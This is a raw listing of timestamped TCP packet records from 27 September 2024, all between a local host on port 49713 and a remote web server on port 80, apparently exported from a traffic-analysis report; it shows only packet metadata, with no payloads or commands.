Sep 27, 2024 04:21:07.069139957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069150925 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069161892 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069174051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069175959 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069185972 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069199085 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069214106 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069250107 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069251060 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069466114 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069478989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069489002 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069499969 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069509029 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069519043 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069521904 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069531918 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069542885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069552898 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069552898 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069565058 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069577932 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069581985 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069588900 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069602966 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069606066 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069616079 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069627047 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069628954 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069653034 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069674969 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069820881 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069833040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069844007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069863081 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069879055 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069891930 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069899082 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069905996 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069916964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069928885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069935083 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069941044 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069952965 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069955111 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069964886 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.069966078 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.069996119 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070013046 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070200920 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070211887 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070221901 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070239067 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070245028 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070250988 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070262909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070269108 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070274115 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070286989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070297956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070300102 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070310116 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070319891 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070322037 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070333958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070336103 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070347071 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070358992 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070358992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070372105 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070382118 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070384026 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070403099 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.070424080 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.070452929 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.157711029 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157799959 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157845020 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.157851934 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157877922 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.157902956 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.157906055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157938957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157952070 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.157974005 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.157979012 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158020020 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158026934 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158071041 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158081055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158123970 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158144951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158179045 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158190966 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158202887 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158222914 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158229113 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158243895 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158245087 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158260107 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158272028 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158276081 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158293962 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158298016 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158298016 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158308029 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158324003 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158334970 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158334970 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158340931 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158348083 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158355951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158366919 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158369064 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158379078 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158384085 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158397913 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158406973 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158411026 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158447027 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158447027 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158461094 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158472061 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158474922 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158484936 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158494949 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158500910 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158508062 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158521891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158529043 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158534050 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158546925 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158552885 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158561945 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158586025 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158600092 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158658028 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158670902 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158682108 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158699036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158700943 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158710957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158721924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158724070 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158734083 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158746958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158757925 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158759117 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158770084 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158771992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158791065 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158801079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158828020 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158874989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158886909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158899069 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158910036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158917904 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158921957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.158947945 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.158982992 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159029007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159041882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159053087 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159064054 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159071922 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159075975 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159084082 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159090042 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159120083 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159136057 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159152985 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159166098 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159178019 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159197092 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159214973 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159312963 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159324884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159343958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159354925 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159357071 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159367085 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159379005 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159395933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159404993 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159409046 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159419060 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159425974 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159430981 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159465075 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159638882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159651041 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159662962 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159676075 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159683943 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159692049 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159703970 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159717083 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159718037 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159729958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159740925 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159746885 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159754992 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159765959 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159790039 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159837008 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.159961939 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159974098 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.159991980 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160002947 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160011053 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160016060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160026073 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160029888 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160043001 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160052061 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160063028 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160068035 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160077095 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160087109 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160095930 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160099983 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160121918 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160136938 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160212040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160223961 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160242081 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160250902 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160255909 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160265923 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160269022 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160279989 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160281897 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160295010 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160300016 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160307884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160315990 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160320044 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160331964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160343885 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160343885 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160356998 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160357952 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160370111 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160382986 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160413980 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160476923 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160511971 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160578012 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160589933 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160600901 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160613060 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160624981 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.160630941 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160650969 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.160666943 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.202531099 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202552080 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202564955 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202575922 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202589989 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202601910 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202611923 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202625036 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.202629089 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.202656984 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.202702999 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248285055 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248339891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248353004 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248363972 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248375893 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248377085 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248398066 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248399973 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248414040 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248425007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248435974 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248446941 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248447895 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248459101 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248471975 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248486996 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248507977 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248527050 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248538971 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248563051 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248568058 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248574018 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248589993 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248594046 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248619080 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248619080 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248646975 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248693943 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248707056 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248722076 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248739958 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248752117 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248764992 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248764992 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248768091 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248776913 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248785019 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248817921 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248861074 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248879910 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248892069 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248903036 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248914003 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248925924 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248927116 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248938084 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248950958 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248959064 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.248972893 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.248990059 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249006987 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249022007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249034882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249063015 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249080896 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249111891 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249124050 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249135017 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249145031 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249152899 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249157906 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249162912 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249178886 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:07.249185085 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:07.249213934 CEST	49713	80	192.168.2.5	194.116.215.195
